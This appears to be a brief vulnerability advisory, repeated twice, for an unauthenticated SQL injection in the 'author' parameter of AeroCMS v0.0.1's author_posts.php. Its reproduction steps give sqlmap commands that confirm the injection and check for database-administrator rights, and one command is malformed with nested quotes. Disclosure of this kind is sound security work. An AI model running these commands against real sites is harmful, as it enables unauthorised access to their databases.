AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability allows attackers does not require authentication to obtain database administrator privileges and access database information. etc.
Reproduct
1) No login required. execute sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author",we can see SQL injection vulnerability exists in the "author"parameter
2) execute sqlmap command: python sqlmap.py -u "python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba,we can see "DBA: TRUE"
Vulnerable Code
The “author” parameter is not escaped before executing the sql query statement
Description
AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability allows attackers does not require authentication to obtain database administrator privileges and access database information. etc.
Reproduct
1) No login required. execute sqlmap command:
python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author",we can see SQL injection vulnerability exists in the "author"parameter2) execute sqlmap command:
python sqlmap.py -u "python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba,we can see "DBA: TRUE"The “author” parameter is not escaped before executing the sql query statement